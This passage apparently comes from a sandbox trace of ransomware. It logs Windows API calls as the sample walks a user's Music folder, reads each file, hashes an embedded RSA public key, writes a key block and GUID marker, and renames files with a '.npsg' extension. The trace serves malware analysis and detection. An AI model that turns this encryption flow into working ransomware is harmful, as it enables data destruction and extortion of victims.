KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.199] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.200] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.200] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.200] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.200] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.200] GetLastError () returned 0x0 [0238.200] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.200] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.200] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.200] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.200] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.201] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.202] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x17f5d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.202] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.202] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.202] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.203] CloseHandle (hObject=0x644) returned 1 [0238.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b83cd0 [0238.207] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\v4b8mFeC7.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\v4b8mfec7.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\v4b8mFeC7.wav.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\v4b8mfec7.wav.npsg")) returned 1 [0238.209] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2839b600, ftCreationTime.dwHighDateTime=0x1d5b821, ftLastAccessTime.dwLowDateTime=0x5527b230, ftLastAccessTime.dwHighDateTime=0x1d5c135, ftLastWriteTime.dwLowDateTime=0x5527b230, ftLastWriteTime.dwHighDateTime=0x1d5c135, nFileSizeHigh=0x0, nFileSizeLow=0xc0cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x-wSlrFQzI.mp3", cAlternateFileName="X-WSLR~1.MP3")) returned 1 [0238.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0238.209] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\x-wSlrFQzI.mp3") returned=".mp3" [0238.210] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\x-wSlrFQzI.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\x-wslrfqzi.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.211] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=49359) returned 1 [0238.211] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.214] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xc0a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.214] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.216] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xc0cf, lpOverlapped=0x0) returned 1 [0238.217] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.217] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.217] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.217] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.218] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.218] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.218] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.218] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.218] GetLastError () returned 0x0 [0238.218] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.218] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.218] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.218] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.219] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.219] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.220] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xc0cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.220] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.220] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.220] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.220] CloseHandle (hObject=0x644) returned 1 [0238.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b83cd0 [0238.225] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\x-wSlrFQzI.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\x-wslrfqzi.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\x-wSlrFQzI.mp3.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\x-wslrfqzi.mp3.npsg")) returned 1 [0238.227] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c2df10, ftCreationTime.dwHighDateTime=0x1d5b716, ftLastAccessTime.dwLowDateTime=0xe652a7f0, ftLastAccessTime.dwHighDateTime=0x1d5c0c3, ftLastWriteTime.dwLowDateTime=0xe652a7f0, ftLastWriteTime.dwHighDateTime=0x1d5c0c3, nFileSizeHigh=0x0, nFileSizeLow=0x1fe0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xb2T7DyZrvwJdpa.m4a", cAlternateFileName="XB2T7D~1.M4A")) returned 1 [0238.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0238.227] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\xb2T7DyZrvwJdpa.m4a") returned=".m4a" [0238.227] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\xb2T7DyZrvwJdpa.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\xb2t7dyzrvwjdpa.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.227] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=8160) returned 1 [0238.227] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.230] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1fba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.230] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.233] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x1fe0, lpOverlapped=0x0) returned 1 [0238.233] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.234] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.234] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.234] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.235] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.235] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.235] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.235] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.235] GetLastError () returned 0x0 [0238.235] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.235] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.235] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.235] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.235] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fe0) returned 0x3b83cd0 [0238.236] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409b48 [0238.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400920 [0238.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409b90 [0238.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400938 [0238.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400968 [0238.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009c8 [0238.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400980 [0238.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.236] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400968 | out: hHeap=0x620000) returned 1 [0238.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400980 | out: hHeap=0x620000) returned 1 [0238.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009c8 | out: hHeap=0x620000) returned 1 [0238.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009c8 [0238.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0238.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400980 [0238.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400968 [0238.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0238.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0238.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0238.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400980 | out: hHeap=0x620000) returned 1 [0238.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400968 | out: hHeap=0x620000) returned 1 [0238.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009c8 | out: hHeap=0x620000) returned 1 [0238.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.238] GetCurrentThreadId () returned 0x5b4 [0238.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b836c8 [0238.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.238] GetCurrentThreadId () returned 0x5b4 [0238.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009c8 [0238.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 